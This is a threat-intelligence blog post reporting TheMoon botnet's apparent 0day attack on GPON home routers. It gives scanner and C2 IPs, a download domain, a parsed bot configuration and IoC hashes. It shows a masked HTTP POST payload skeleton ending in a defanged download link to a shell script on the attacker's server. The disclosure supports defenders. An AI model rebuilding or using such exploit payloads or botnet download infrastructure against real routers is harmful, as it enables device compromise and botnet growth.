GPON Exploit in the Wild (IV) - TheMoon Botnet Join in with a 0day(?)

This article was co-authored by Hui Wang, Rootkiter and Yegenshen.

It looks like this GPON party will never end. We just found TheMoon botnet has join the party.

TheMoon botnet has been discussed in our previous article, in Chinese. Its activity can be seen as early as in 2014, and since 2017 it has merged at least 6 IoT device exploits into it's code. Now it comes to GPON home router.

A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day. And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose NOT to disclose the attack payload details.

The features about this round of TheMoon:

  • Scanner IP: 177.141.64.108 Brazil/BR São Paulo "AS28573 CLARO S.A."
  • Scanning Port:80 ,8080,81,82,8888, with the GPON scan only on port 80
  • Download Server: domstates.su
  • C2 Server:
    • 91.215.158.118 Netherlands/NL Amsterdam "AS60144 3W Infra B.V."
    • 149.202.211.227 France/FR Fontenay-sous-Bois "AS16276 OVH SAS"
    • 208.110.66.34 United States/US Kansas City "AS32097 WholeSale Internet, Inc."
    • 173.208.219.42 United States/US Kansas City "AS32097 WholeSale Internet, Inc."

The download server is the same to the one in our previous blog. This is why we attribute this round of attack to TheMoon botnet.

Attacking Payload (masked):

POST /--------/--------?---------/ HTTP/1.1  
Accept: */*  
Host: {}  
User-Agent: Wget(linux)  
Content-Length: 287  
Content-Type: application/x-www-form-urlencoded  
-------------------------------------------------------------
hxxp://domstates.su/gpon.sh  

The character of TheMoon botnet can be summarized in the following json:

"nttpd,1-mips-be-t3-z":{
       "proto"   :"TCP",
       "version" :1,
       "regkey"  :0xB8,                            # previous 0xb7
       "specific":0x6D61641D,                      # previous 0x6D61641C
       "regport" :5784,                            # previous 5783
       "ccport"  :5184,                            # previous 5183
       "dwlport" :4584,                            # previous 4583
       "peerlist":[
           "91.215.158.118", # 0x5BD79E76          # C2, not changed
           "149.202.211.227",# 0x95CAD3E3          # C2, not changed
           "208.110.66.34",  # 0xD06E4222          # C2, not changed
           "173.208.219.42", # 0xADD0DB2A          # C2, not changed
       ]  
   }

IoC

Downloading URL

md5=17fb1bfae44a9008a4c9b4bdc6b327bd    url=hxxp://domstates.su/.nttpd,1-mips-be-t3-z  
md5=299919e8a5b4c8592db0c47207935b69    url=hxxp://domstates.su/gpon.sh  

C2

91.215.158.118 Netherlands/NL Amsterdam    "AS60144 3W Infra B.V."  
149.202.211.227 France/FR Fontenay-sous-Bois    "AS16276 OVH SAS"  
208.110.66.34 United States/US Kansas City    "AS32097 WholeSale Internet, Inc."  
173.208.219.42 United States/US Kansas City    "AS32097 WholeSale Internet, Inc."  

Scanner IP

177.141.64.108 Brazil/BR São Paulo    "AS28573 CLARO S.A."